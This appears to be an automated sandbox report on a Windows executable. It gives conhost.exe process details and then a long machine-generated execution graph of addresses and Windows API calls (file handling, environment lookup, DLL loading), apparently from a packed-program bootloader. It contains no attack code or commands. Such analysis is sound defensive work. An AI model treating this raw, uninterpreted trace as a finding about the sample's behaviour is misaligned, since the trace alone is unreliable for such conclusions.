                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:123
                                                                                                                                                                                                                            Start time:02:38:53
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:8.7%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                              Signature Coverage:19.9%
                                                                                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                                                                                              Total number of Limit Nodes:31
                                                                                                                                                                                                                              execution_graph 19718 7ff79a33add9 19721 7ff79a3254e8 LeaveCriticalSection 19718->19721 20021 7ff79a33ae6e 20022 7ff79a33ae7d 20021->20022 20024 7ff79a33ae87 20021->20024 20025 7ff79a3303a8 LeaveCriticalSection 20022->20025 19809 7ff79a32f9fc 19810 7ff79a32fbee 19809->19810 19812 7ff79a32fa3e _isindst 19809->19812 19811 7ff79a324f78 memcpy_s 11 API calls 19810->19811 19829 7ff79a32fbde 19811->19829 19812->19810 19815 7ff79a32fabe _isindst 19812->19815 19813 7ff79a31c5c0 _log10_special 8 API calls 19814 7ff79a32fc09 19813->19814 19830 7ff79a336204 19815->19830 19820 7ff79a32fc1a 19822 7ff79a32a970 _isindst 17 API calls 19820->19822 19824 7ff79a32fc2e 19822->19824 19827 7ff79a32fb1b 19827->19829 19855 7ff79a336248 19827->19855 19829->19813 19831 7ff79a32fadc 19830->19831 19832 7ff79a336213 19830->19832 19837 7ff79a335608 19831->19837 19862 7ff79a330348 EnterCriticalSection 19832->19862 19838 7ff79a32faf1 19837->19838 19839 7ff79a335611 19837->19839 19838->19820 19843 7ff79a335638 19838->19843 19840 7ff79a324f78 memcpy_s 11 API calls 19839->19840 19841 7ff79a335616 19840->19841 19842 7ff79a32a950 _invalid_parameter_noinfo 37 API calls 19841->19842 19842->19838 19844 7ff79a335641 19843->19844 19848 7ff79a32fb02 19843->19848 19845 7ff79a324f78 memcpy_s 11 API calls 19844->19845 19846 7ff79a335646 19845->19846 19847 7ff79a32a950 _invalid_parameter_noinfo 37 API calls 19846->19847 19847->19848 19848->19820 19849 7ff79a335668 19848->19849 19850 7ff79a32fb13 19849->19850 19851 7ff79a335671 19849->19851 19850->19820 19850->19827 19852 7ff79a324f78 memcpy_s 11 API calls 19851->19852 19853 7ff79a335676 19852->19853 19854 7ff79a32a950 _invalid_parameter_noinfo 37 API calls 19853->19854 19854->19850 19863 7ff79a330348 EnterCriticalSection 19855->19863 20039 7ff79a325480 20040 7ff79a32548b 20039->20040 20048 7ff79a32f314 20040->20048 20061 7ff79a330348 EnterCriticalSection 20048->20061 18944 7ff79a32c590 18955 7ff79a330348 EnterCriticalSection 18944->18955 15918 7ff79a325698 15919 7ff79a3256cf 15918->15919 15920 7ff79a3256b2 15918->15920 15919->15920 15921 7ff79a3256e2 CreateFileW 15919->15921 15943 7ff79a324f58 15920->15943 15923 7ff79a32574c 15921->15923 15924 7ff79a325716 15921->15924 15978 7ff79a325c74 15923->15978 15952 7ff79a3257ec GetFileType 15924->15952 15933 7ff79a32572b CloseHandle 15938 7ff79a3256ca 15933->15938 15934 7ff79a325741 CloseHandle 15934->15938 15935 7ff79a325780 16004 7ff79a325a34 15935->16004 15936 7ff79a325755 15999 7ff79a324eec 15936->15999 15942 7ff79a32575f 15942->15938 16021 7ff79a32b338 GetLastError 15943->16021 15945 7ff79a324f61 15946 7ff79a324f78 15945->15946 15947 7ff79a32b338 memcpy_s 11 API calls 15946->15947 15948 7ff79a324f81 15947->15948 15949 7ff79a32a950 15948->15949 16079 7ff79a32a7e8 15949->16079 15951 7ff79a32a969 15951->15938 15953 7ff79a3258f7 15952->15953 15954 7ff79a32583a 15952->15954 15956 7ff79a3258ff 15953->15956 15957 7ff79a325921 15953->15957 15955 7ff79a325866 GetFileInformationByHandle 15954->15955 15959 7ff79a325b70 21 API calls 15954->15959 15960 7ff79a32588f 15955->15960 15961 7ff79a325912 GetLastError 15955->15961 15956->15961 15962 7ff79a325903 15956->15962 15958 7ff79a325944 PeekNamedPipe 15957->15958 15967 7ff79a3258e2 15957->15967 15958->15967 15964 7ff79a325854 15959->15964 15965 7ff79a325a34 51 API calls 15960->15965 15963 7ff79a324eec _fread_nolock 11 API calls 15961->15963 15966 7ff79a324f78 memcpy_s 11 API calls 15962->15966 15963->15967 15964->15955 15964->15967 15969 7ff79a32589a 15965->15969 15966->15967 15968 7ff79a31c5c0 _log10_special 8 API calls 15967->15968 15970 7ff79a325724 15968->15970 16145 7ff79a325994 15969->16145 15970->15933 15970->15934 15973 7ff79a325994 10 API calls 15974 7ff79a3258b9 15973->15974 15975 7ff79a325994 10 API calls 15974->15975 15976 7ff79a3258ca 15975->15976 15976->15967 15977 7ff79a324f78 memcpy_s 11 API calls 15976->15977 15977->15967 15979 7ff79a325caa 15978->15979 15980 7ff79a324f78 memcpy_s 11 API calls 15979->15980 15998 7ff79a325d42 __vcrt_freefls 15979->15998 15982 7ff79a325cbc 15980->15982 15981 7ff79a31c5c0 _log10_special 8 API calls 15983 7ff79a325751 15981->15983 15984 7ff79a324f78 memcpy_s 11 API calls 15982->15984 15983->15935 15983->15936 15985 7ff79a325cc4 15984->15985 16152 7ff79a327e78 15985->16152 15987 7ff79a325cd9 15988 7ff79a325ceb 15987->15988 15989 7ff79a325ce1 15987->15989 15991 7ff79a324f78 memcpy_s 11 API calls 15988->15991 15990 7ff79a324f78 memcpy_s 11 API calls 15989->15990 15995 7ff79a325ce6 15990->15995 15992 7ff79a325cf0 15991->15992 15993 7ff79a324f78 memcpy_s 11 API calls 15992->15993 15992->15998 15994 7ff79a325cfa 15993->15994 15997 7ff79a327e78 45 API calls 15994->15997 15996 7ff79a325d34 GetDriveTypeW 15995->15996 15995->15998 15996->15998 15997->15995 15998->15981 16000 7ff79a32b338 memcpy_s 11 API calls 15999->16000 16001 7ff79a324ef9 Concurrency::details::SchedulerProxy::DeleteThis 16000->16001 16002 7ff79a32b338 memcpy_s 11 API calls 16001->16002 16003 7ff79a324f1b 16002->16003 16003->15942 16006 7ff79a325a5c 16004->16006 16005 7ff79a32578d 16014 7ff79a325b70 16005->16014 16006->16005 16246 7ff79a32f794 16006->16246 16008 7ff79a325af0 16008->16005 16009 7ff79a32f794 51 API calls 16008->16009 16010 7ff79a325b03 16009->16010 16010->16005 16011 7ff79a32f794 51 API calls 16010->16011 16012 7ff79a325b16 16011->16012 16012->16005 16013 7ff79a32f794 51 API calls 16012->16013 16013->16005 16015 7ff79a325b8a 16014->16015 16016 7ff79a325bc1 16015->16016 16017 7ff79a325b9a 16015->16017 16018 7ff79a32f628 21 API calls 16016->16018 16019 7ff79a324eec _fread_nolock 11 API calls 16017->16019 16020 7ff79a325baa 16017->16020 16018->16020 16019->16020 16020->15942 16022 7ff79a32b379 FlsSetValue 16021->16022 16023 7ff79a32b35c 16021->16023 16024 7ff79a32b38b 16022->16024 16027 7ff79a32b369 SetLastError 16022->16027 16023->16022 16023->16027 16038 7ff79a32ec08 16024->16038 16027->15945 16029 7ff79a32b3b8 FlsSetValue 16032 7ff79a32b3d6 16029->16032 16033 7ff79a32b3c4 FlsSetValue 16029->16033 16030 7ff79a32b3a8 FlsSetValue 16031 7ff79a32b3b1 16030->16031 16045 7ff79a32a9b8 16031->16045 16051 7ff79a32af64 16032->16051 16033->16031 16044 7ff79a32ec19 memcpy_s 16038->16044 16039 7ff79a32ec6a 16041 7ff79a324f78 memcpy_s 10 API calls 16039->16041 16040 7ff79a32ec4e HeapAlloc 16042 7ff79a32b39a 16040->16042 16040->16044 16041->16042 16042->16029 16042->16030 16044->16039 16044->16040 16056 7ff79a333600 16044->16056 16046 7ff79a32a9bd RtlFreeHeap 16045->16046 16050 7ff79a32a9ec 16045->16050 16047 7ff79a32a9d8 GetLastError 16046->16047 16046->16050 16048 7ff79a32a9e5 Concurrency::details::SchedulerProxy::DeleteThis 16047->16048 16049 7ff79a324f78 memcpy_s 9 API calls 16048->16049 16049->16050 16050->16027 16065 7ff79a32ae3c 16051->16065 16059 7ff79a333640 16056->16059 16064 7ff79a330348 EnterCriticalSection 16059->16064 16077 7ff79a330348 EnterCriticalSection 16065->16077 16080 7ff79a32a813 16079->16080 16083 7ff79a32a884 16080->16083 16082 7ff79a32a83a 16082->15951 16093 7ff79a32a5cc 16083->16093 16086 7ff79a32a8bf 16086->16082 16094 7ff79a32a5e8 GetLastError 16093->16094 16095 7ff79a32a623 16093->16095 16096 7ff79a32a5f8 16094->16096 16095->16086 16099 7ff79a32a638 16095->16099 16106 7ff79a32b400 16096->16106 16100 7ff79a32a66c 16099->16100 16101 7ff79a32a654 GetLastError SetLastError 16099->16101 16100->16086 16102 7ff79a32a970 IsProcessorFeaturePresent 16100->16102 16101->16100 16103 7ff79a32a983 16102->16103 16123 7ff79a32a684 16103->16123 16107 7ff79a32b43a FlsSetValue 16106->16107 16108 7ff79a32b41f FlsGetValue 16106->16108 16109 7ff79a32a613 SetLastError 16107->16109 16111 7ff79a32b447 16107->16111 16108->16109 16110 7ff79a32b434 16108->16110 16109->16095 16110->16107 16112 7ff79a32ec08 memcpy_s 11 API calls 16111->16112 16113 7ff79a32b456 16112->16113 16114 7ff79a32b474 FlsSetValue 16113->16114 16115 7ff79a32b464 FlsSetValue 16113->16115 16116 7ff79a32b492 16114->16116 16117 7ff79a32b480 FlsSetValue 16114->16117 16118 7ff79a32b46d 16115->16118 16119 7ff79a32af64 memcpy_s 11 API calls 16116->16119 16117->16118 16120 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16118->16120 16121 7ff79a32b49a 16119->16121 16120->16109 16122 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16121->16122 16122->16109 16124 7ff79a32a6be _isindst memcpy_s 16123->16124 16125 7ff79a32a6e6 RtlCaptureContext RtlLookupFunctionEntry 16124->16125 16126 7ff79a32a720 RtlVirtualUnwind 16125->16126 16127 7ff79a32a756 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16125->16127 16126->16127 16130 7ff79a32a7a8 _isindst 16127->16130 16131 7ff79a31c5c0 16130->16131 16134 7ff79a31c5c9 16131->16134 16132 7ff79a31c950 IsProcessorFeaturePresent 16135 7ff79a31c968 16132->16135 16133 7ff79a31c5d4 GetCurrentProcess TerminateProcess 16134->16132 16134->16133 16140 7ff79a31cb48 RtlCaptureContext 16135->16140 16141 7ff79a31cb62 RtlLookupFunctionEntry 16140->16141 16142 7ff79a31cb78 RtlVirtualUnwind 16141->16142 16143 7ff79a31c97b 16141->16143 16142->16141 16142->16143 16144 7ff79a31c910 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16143->16144 16146 7ff79a3259bd FileTimeToSystemTime 16145->16146 16147 7ff79a3259b0 16145->16147 16148 7ff79a3259b8 16146->16148 16149 7ff79a3259d1 SystemTimeToTzSpecificLocalTime 16146->16149 16147->16146 16147->16148 16150 7ff79a31c5c0 _log10_special 8 API calls 16148->16150 16149->16148 16151 7ff79a3258a9 16150->16151 16151->15973 16153 7ff79a327f02 16152->16153 16154 7ff79a327e94 16152->16154 16189 7ff79a330830 16153->16189 16154->16153 16156 7ff79a327e99 16154->16156 16157 7ff79a327ece 16156->16157 16158 7ff79a327eb1 16156->16158 16172 7ff79a327cbc GetFullPathNameW 16157->16172 16164 7ff79a327c48 GetFullPathNameW 16158->16164 16163 7ff79a327ec6 __vcrt_freefls 16163->15987 16165 7ff79a327c6e GetLastError 16164->16165 16166 7ff79a327c84 16164->16166 16168 7ff79a324eec _fread_nolock 11 API calls 16165->16168 16167 7ff79a327c80 16166->16167 16171 7ff79a324f78 memcpy_s 11 API calls 16166->16171 16167->16163 16169 7ff79a327c7b 16168->16169 16170 7ff79a324f78 memcpy_s 11 API calls 16169->16170 16170->16167 16171->16167 16173 7ff79a327cef GetLastError 16172->16173 16176 7ff79a327d05 __vcrt_freefls 16172->16176 16174 7ff79a324eec _fread_nolock 11 API calls 16173->16174 16175 7ff79a327cfc 16174->16175 16177 7ff79a324f78 memcpy_s 11 API calls 16175->16177 16178 7ff79a327d01 16176->16178 16179 7ff79a327d5f GetFullPathNameW 16176->16179 16177->16178 16180 7ff79a327d94 16178->16180 16179->16173 16179->16178 16181 7ff79a327e08 memcpy_s 16180->16181 16182 7ff79a327dbd memcpy_s 16180->16182 16181->16163 16182->16181 16183 7ff79a327df1 16182->16183 16187 7ff79a327e2a 16182->16187 16184 7ff79a324f78 memcpy_s 11 API calls 16183->16184 16185 7ff79a327df6 16184->16185 16186 7ff79a32a950 _invalid_parameter_noinfo 37 API calls 16185->16186 16186->16181 16187->16181 16188 7ff79a324f78 memcpy_s 11 API calls 16187->16188 16188->16185 16192 7ff79a330640 16189->16192 16193 7ff79a33066b 16192->16193 16194 7ff79a330682 16192->16194 16195 7ff79a324f78 memcpy_s 11 API calls 16193->16195 16196 7ff79a3306a7 16194->16196 16197 7ff79a330686 16194->16197 16211 7ff79a330670 16195->16211 16230 7ff79a32f628 16196->16230 16218 7ff79a3307ac 16197->16218 16201 7ff79a33068f 16203 7ff79a324f58 _fread_nolock 11 API calls 16201->16203 16202 7ff79a32a950 _invalid_parameter_noinfo 37 API calls 16217 7ff79a33067b __vcrt_freefls 16202->16217 16205 7ff79a330694 16203->16205 16204 7ff79a3306ac 16206 7ff79a330751 16204->16206 16213 7ff79a3306d3 16204->16213 16208 7ff79a324f78 memcpy_s 11 API calls 16205->16208 16206->16193 16209 7ff79a330759 16206->16209 16207 7ff79a31c5c0 _log10_special 8 API calls 16210 7ff79a3307a1 16207->16210 16208->16211 16212 7ff79a327c48 13 API calls 16209->16212 16210->16163 16211->16202 16212->16217 16214 7ff79a327cbc 14 API calls 16213->16214 16215 7ff79a330717 16214->16215 16216 7ff79a327d94 37 API calls 16215->16216 16215->16217 16216->16217 16217->16207 16219 7ff79a3307f6 16218->16219 16220 7ff79a3307c6 16218->16220 16222 7ff79a330801 GetDriveTypeW 16219->16222 16223 7ff79a3307e1 16219->16223 16221 7ff79a324f58 _fread_nolock 11 API calls 16220->16221 16224 7ff79a3307cb 16221->16224 16222->16223 16226 7ff79a31c5c0 _log10_special 8 API calls 16223->16226 16225 7ff79a324f78 memcpy_s 11 API calls 16224->16225 16227 7ff79a3307d6 16225->16227 16228 7ff79a33068b 16226->16228 16229 7ff79a32a950 _invalid_parameter_noinfo 37 API calls 16227->16229 16228->16201 16228->16204 16229->16223 16244 7ff79a33a540 16230->16244 16232 7ff79a32f65e GetCurrentDirectoryW 16233 7ff79a32f69c 16232->16233 16234 7ff79a32f675 16232->16234 16235 7ff79a32ec08 memcpy_s 11 API calls 16233->16235 16236 7ff79a31c5c0 _log10_special 8 API calls 16234->16236 16237 7ff79a32f6ab 16235->16237 16238 7ff79a32f709 16236->16238 16239 7ff79a32f6b5 GetCurrentDirectoryW 16237->16239 16240 7ff79a32f6c4 16237->16240 16238->16204 16239->16240 16241 7ff79a32f6c9 16239->16241 16242 7ff79a324f78 memcpy_s 11 API calls 16240->16242 16243 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16241->16243 16242->16241 16243->16234 16245 7ff79a33a530 16244->16245 16245->16232 16245->16245 16247 7ff79a32f7c5 16246->16247 16248 7ff79a32f7a1 16246->16248 16250 7ff79a32f7ff 16247->16250 16253 7ff79a32f81e 16247->16253 16248->16247 16249 7ff79a32f7a6 16248->16249 16251 7ff79a324f78 memcpy_s 11 API calls 16249->16251 16252 7ff79a324f78 memcpy_s 11 API calls 16250->16252 16254 7ff79a32f7ab 16251->16254 16256 7ff79a32f804 16252->16256 16263 7ff79a324fbc 16253->16263 16255 7ff79a32a950 _invalid_parameter_noinfo 37 API calls 16254->16255 16258 7ff79a32f7b6 16255->16258 16259 7ff79a32a950 _invalid_parameter_noinfo 37 API calls 16256->16259 16258->16008 16260 7ff79a32f80f 16259->16260 16260->16008 16261 7ff79a33054c 51 API calls 16262 7ff79a32f82b 16261->16262 16262->16260 16262->16261 16264 7ff79a324fdb 16263->16264 16265 7ff79a324fe0 16263->16265 16264->16262 16265->16264 16271 7ff79a32b1c0 GetLastError 16265->16271 16272 7ff79a32b201 FlsSetValue 16271->16272 16273 7ff79a32b1e4 FlsGetValue 16271->16273 16275 7ff79a32b213 16272->16275 16290 7ff79a32b1f1 16272->16290 16274 7ff79a32b1fb 16273->16274 16273->16290 16274->16272 16277 7ff79a32ec08 memcpy_s 11 API calls 16275->16277 16276 7ff79a32b26d SetLastError 16278 7ff79a324ffb 16276->16278 16279 7ff79a32b28d 16276->16279 16280 7ff79a32b222 16277->16280 16293 7ff79a32d9f4 16278->16293 16301 7ff79a32a574 16279->16301 16282 7ff79a32b240 FlsSetValue 16280->16282 16283 7ff79a32b230 FlsSetValue 16280->16283 16285 7ff79a32b25e 16282->16285 16286 7ff79a32b24c FlsSetValue 16282->16286 16284 7ff79a32b239 16283->16284 16288 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16284->16288 16289 7ff79a32af64 memcpy_s 11 API calls 16285->16289 16286->16284 16288->16290 16291 7ff79a32b266 16289->16291 16290->16276 16292 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16291->16292 16292->16276 16294 7ff79a32da09 16293->16294 16295 7ff79a32501e 16293->16295 16294->16295 16345 7ff79a333374 16294->16345 16297 7ff79a32da60 16295->16297 16298 7ff79a32da75 16297->16298 16300 7ff79a32da88 16297->16300 16298->16300 16358 7ff79a3326c0 16298->16358 16300->16264 16310 7ff79a3336c0 16301->16310 16336 7ff79a333678 16310->16336 16341 7ff79a330348 EnterCriticalSection 16336->16341 16346 7ff79a32b1c0 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16345->16346 16347 7ff79a333383 16346->16347 16348 7ff79a3333ce 16347->16348 16357 7ff79a330348 EnterCriticalSection 16347->16357 16348->16295 16359 7ff79a32b1c0 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16358->16359 16360 7ff79a3326c9 16359->16360 18992 7ff79a331720 19003 7ff79a337454 18992->19003 19004 7ff79a337461 19003->19004 19005 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19004->19005 19006 7ff79a33747d 19004->19006 19005->19004 19007 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19006->19007 19008 7ff79a331729 19006->19008 19007->19006 19009 7ff79a330348 EnterCriticalSection 19008->19009 16361 7ff79a31ccac 16382 7ff79a31ce7c 16361->16382 16364 7ff79a31cdf8 16536 7ff79a31d19c IsProcessorFeaturePresent 16364->16536 16365 7ff79a31ccc8 __scrt_acquire_startup_lock 16367 7ff79a31ce02 16365->16367 16371 7ff79a31cce6 __scrt_release_startup_lock 16365->16371 16368 7ff79a31d19c 7 API calls 16367->16368 16370 7ff79a31ce0d __FrameHandler3::FrameUnwindToEmptyState 16368->16370 16369 7ff79a31cd0b 16371->16369 16372 7ff79a31cd91 16371->16372 16525 7ff79a329b9c 16371->16525 16388 7ff79a31d2e4 16372->16388 16374 7ff79a31cd96 16391 7ff79a311000 16374->16391 16380 7ff79a31cdb9 16380->16370 16532 7ff79a31d000 16380->16532 16383 7ff79a31ce84 16382->16383 16384 7ff79a31ce90 __scrt_dllmain_crt_thread_attach 16383->16384 16385 7ff79a31ccc0 16384->16385 16386 7ff79a31ce9d 16384->16386 16385->16364 16385->16365 16386->16385 16543 7ff79a31d8f8 16386->16543 16389 7ff79a33a540 memcpy_s 16388->16389 16390 7ff79a31d2fb GetStartupInfoW 16389->16390 16390->16374 16392 7ff79a311009 16391->16392 16570 7ff79a3254f4 16392->16570 16394 7ff79a3137fb 16577 7ff79a3136b0 16394->16577 16399 7ff79a31c5c0 _log10_special 8 API calls 16402 7ff79a313ca7 16399->16402 16400 7ff79a31391b 16746 7ff79a3145b0 16400->16746 16401 7ff79a31383c 16737 7ff79a311c80 16401->16737 16530 7ff79a31d328 GetModuleHandleW 16402->16530 16405 7ff79a31385b 16649 7ff79a318a20 16405->16649 16408 7ff79a31396a 16769 7ff79a312710 16408->16769 16410 7ff79a31388e 16418 7ff79a3138bb __vcrt_freefls 16410->16418 16741 7ff79a318b90 16410->16741 16412 7ff79a31395d 16413 7ff79a313962 16412->16413 16414 7ff79a313984 16412->16414 16765 7ff79a3200bc 16413->16765 16416 7ff79a311c80 49 API calls 16414->16416 16419 7ff79a3139a3 16416->16419 16420 7ff79a318a20 14 API calls 16418->16420 16427 7ff79a3138de __vcrt_freefls 16418->16427 16424 7ff79a311950 115 API calls 16419->16424 16420->16427 16422 7ff79a313a0b 16423 7ff79a318b90 40 API calls 16422->16423 16425 7ff79a313a17 16423->16425 16426 7ff79a3139ce 16424->16426 16428 7ff79a318b90 40 API calls 16425->16428 16426->16405 16429 7ff79a3139de 16426->16429 16433 7ff79a31390e __vcrt_freefls 16427->16433 16780 7ff79a318b30 16427->16780 16430 7ff79a313a23 16428->16430 16431 7ff79a312710 54 API calls 16429->16431 16432 7ff79a318b90 40 API calls 16430->16432 16473 7ff79a313808 __vcrt_freefls 16431->16473 16432->16433 16434 7ff79a318a20 14 API calls 16433->16434 16435 7ff79a313a3b 16434->16435 16436 7ff79a313b2f 16435->16436 16437 7ff79a313a60 __vcrt_freefls 16435->16437 16438 7ff79a312710 54 API calls 16436->16438 16439 7ff79a318b30 40 API calls 16437->16439 16450 7ff79a313aab 16437->16450 16438->16473 16439->16450 16440 7ff79a318a20 14 API calls 16441 7ff79a313bf4 __vcrt_freefls 16440->16441 16442 7ff79a313d41 16441->16442 16443 7ff79a313c46 16441->16443 16787 7ff79a3144d0 16442->16787 16444 7ff79a313c50 16443->16444 16445 7ff79a313cd4 16443->16445 16662 7ff79a3190e0 16444->16662 16448 7ff79a318a20 14 API calls 16445->16448 16452 7ff79a313ce0 16448->16452 16449 7ff79a313d4f 16453 7ff79a313d71 16449->16453 16454 7ff79a313d65 16449->16454 16450->16440 16455 7ff79a313c61 16452->16455 16458 7ff79a313ced 16452->16458 16457 7ff79a311c80 49 API calls 16453->16457 16790 7ff79a314620 16454->16790 16460 7ff79a312710 54 API calls 16455->16460 16465 7ff79a313cc8 __vcrt_freefls 16457->16465 16461 7ff79a311c80 49 API calls 16458->16461 16460->16473 16464 7ff79a313d0b 16461->16464 16462 7ff79a313dc4 16712 7ff79a319400 16462->16712 16464->16465 16468 7ff79a313d12 16464->16468 16465->16462 16469 7ff79a313da7 SetDllDirectoryW LoadLibraryExW 16465->16469 16467 7ff79a313dd7 SetDllDirectoryW 16472 7ff79a313e0a 16467->16472 16516 7ff79a313e5a 16467->16516 16471 7ff79a312710 54 API calls 16468->16471 16469->16462 16471->16473 16474 7ff79a318a20 14 API calls 16472->16474 16473->16399 16482 7ff79a313e16 __vcrt_freefls 16474->16482 16475 7ff79a313ffc 16477 7ff79a314029 16475->16477 16478 7ff79a314006 PostMessageW GetMessageW 16475->16478 16476 7ff79a313f1b 16717 7ff79a3133c0 16476->16717 16867 7ff79a313360 16477->16867 16478->16477 16485 7ff79a313ef2 16482->16485 16489 7ff79a313e4e 16482->16489 16488 7ff79a318b30 40 API calls 16485->16488 16488->16516 16489->16516 16793 7ff79a316db0 16489->16793 16516->16475 16516->16476 16526 7ff79a329bb3 16525->16526 16527 7ff79a329bd4 16525->16527 16526->16372 18834 7ff79a32a448 16527->18834 16531 7ff79a31d339 16530->16531 16531->16380 16534 7ff79a31d011 16532->16534 16533 7ff79a31cdd0 16533->16369 16534->16533 16535 7ff79a31d8f8 7 API calls 16534->16535 16535->16533 16537 7ff79a31d1c2 _isindst memcpy_s 16536->16537 16538 7ff79a31d1e1 RtlCaptureContext RtlLookupFunctionEntry 16537->16538 16539 7ff79a31d20a RtlVirtualUnwind 16538->16539 16540 7ff79a31d246 memcpy_s 16538->16540 16539->16540 16541 7ff79a31d278 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16540->16541 16542 7ff79a31d2c6 _isindst 16541->16542 16542->16367 16544 7ff79a31d90a 16543->16544 16545 7ff79a31d900 16543->16545 16544->16385 16549 7ff79a31dc94 16545->16549 16550 7ff79a31d905 16549->16550 16551 7ff79a31dca3 16549->16551 16553 7ff79a31dd00 16550->16553 16557 7ff79a31ded0 16551->16557 16554 7ff79a31dd2b 16553->16554 16555 7ff79a31dd0e DeleteCriticalSection 16554->16555 16556 7ff79a31dd2f 16554->16556 16555->16554 16556->16544 16561 7ff79a31dd38 16557->16561 16562 7ff79a31de22 TlsFree 16561->16562 16568 7ff79a31dd7c __vcrt_FlsAlloc 16561->16568 16563 7ff79a31ddaa LoadLibraryExW 16565 7ff79a31de49 16563->16565 16566 7ff79a31ddcb GetLastError 16563->16566 16564 7ff79a31de69 GetProcAddress 16564->16562 16565->16564 16567 7ff79a31de60 FreeLibrary 16565->16567 16566->16568 16567->16564 16568->16562 16568->16563 16568->16564 16569 7ff79a31dded LoadLibraryExW 16568->16569 16569->16565 16569->16568 16573 7ff79a32f4f0 16570->16573 16571 7ff79a32f543 16572 7ff79a32a884 _invalid_parameter_noinfo 37 API calls 16571->16572 16576 7ff79a32f56c 16572->16576 16573->16571 16574 7ff79a32f596 16573->16574 16880 7ff79a32f3c8 16574->16880 16576->16394 16888 7ff79a31c8c0 16577->16888 16580 7ff79a3136eb GetLastError 16895 7ff79a312c50 16580->16895 16581 7ff79a313710 16890 7ff79a3192f0 FindFirstFileExW 16581->16890 16585 7ff79a31377d 16921 7ff79a3194b0 16585->16921 16586 7ff79a313723 16910 7ff79a319370 CreateFileW 16586->16910 16588 7ff79a31c5c0 _log10_special 8 API calls 16591 7ff79a3137b5 16588->16591 16590 7ff79a31378b 16594 7ff79a312810 49 API calls 16590->16594 16597 7ff79a313706 16590->16597 16591->16473 16599 7ff79a311950 16591->16599 16593 7ff79a313734 16913 7ff79a312810 16593->16913 16594->16597 16596 7ff79a31374c __vcrt_FlsAlloc 16596->16585 16597->16588 16600 7ff79a3145b0 108 API calls 16599->16600 16601 7ff79a311985 16600->16601 16602 7ff79a311c43 16601->16602 16603 7ff79a317f80 83 API calls 16601->16603 16604 7ff79a31c5c0 _log10_special 8 API calls 16602->16604 16605 7ff79a3119cb 16603->16605 16606 7ff79a311c5e 16604->16606 16648 7ff79a311a03 16605->16648 17285 7ff79a320744 16605->17285 16606->16400 16606->16401 16608 7ff79a3200bc 74 API calls 16608->16602 16609 7ff79a3119e5 16610 7ff79a311a08 16609->16610 16611 7ff79a3119e9 16609->16611 17289 7ff79a32040c 16610->17289 16613 7ff79a324f78 memcpy_s 11 API calls 16611->16613 16615 7ff79a3119ee 16613->16615 17292 7ff79a312910 16615->17292 16616 7ff79a311a45 16622 7ff79a311a7b 16616->16622 16623 7ff79a311a5c 16616->16623 16617 7ff79a311a26 16619 7ff79a324f78 memcpy_s 11 API calls 16617->16619 16620 7ff79a311a2b 16619->16620 16621 7ff79a312910 54 API calls 16620->16621 16621->16648 16624 7ff79a311c80 49 API calls 16622->16624 16625 7ff79a324f78 memcpy_s 11 API calls 16623->16625 16626 7ff79a311a92 16624->16626 16627 7ff79a311a61 16625->16627 16628 7ff79a311c80 49 API calls 16626->16628 16629 7ff79a312910 54 API calls 16627->16629 16630 7ff79a311add 16628->16630 16629->16648 16631 7ff79a320744 73 API calls 16630->16631 16632 7ff79a311b01 16631->16632 16633 7ff79a311b35 16632->16633 16634 7ff79a311b16 16632->16634 16636 7ff79a32040c _fread_nolock 53 API calls 16633->16636 16635 7ff79a324f78 memcpy_s 11 API calls 16634->16635 16637 7ff79a311b1b 16635->16637 16638 7ff79a311b4a 16636->16638 16641 7ff79a312910 54 API calls 16637->16641 16639 7ff79a311b6f 16638->16639 16640 7ff79a311b50 16638->16640 17307 7ff79a320180 16639->17307 16642 7ff79a324f78 memcpy_s 11 API calls 16640->16642 16641->16648 16644 7ff79a311b55 16642->16644 16646 7ff79a312910 54 API calls 16644->16646 16646->16648 16647 7ff79a312710 54 API calls 16647->16648 16648->16608 16650 7ff79a318a2a 16649->16650 16651 7ff79a319400 2 API calls 16650->16651 16652 7ff79a318a49 GetEnvironmentVariableW 16651->16652 16653 7ff79a318ab2 16652->16653 16654 7ff79a318a66 ExpandEnvironmentStringsW 16652->16654 16656 7ff79a31c5c0 _log10_special 8 API calls 16653->16656 16654->16653 16655 7ff79a318a88 16654->16655 16657 7ff79a3194b0 2 API calls 16655->16657 16658 7ff79a318ac4 16656->16658 16659 7ff79a318a9a 16657->16659 16658->16410 16660 7ff79a31c5c0 _log10_special 8 API calls 16659->16660 16661 7ff79a318aaa 16660->16661 16661->16410 16663 7ff79a3190f5 16662->16663 17525 7ff79a318760 GetCurrentProcess OpenProcessToken 16663->17525 16666 7ff79a318760 7 API calls 16667 7ff79a319121 16666->16667 16668 7ff79a31913a 16667->16668 16669 7ff79a319154 16667->16669 16670 7ff79a3126b0 48 API calls 16668->16670 16671 7ff79a3126b0 48 API calls 16669->16671 16672 7ff79a319152 16670->16672 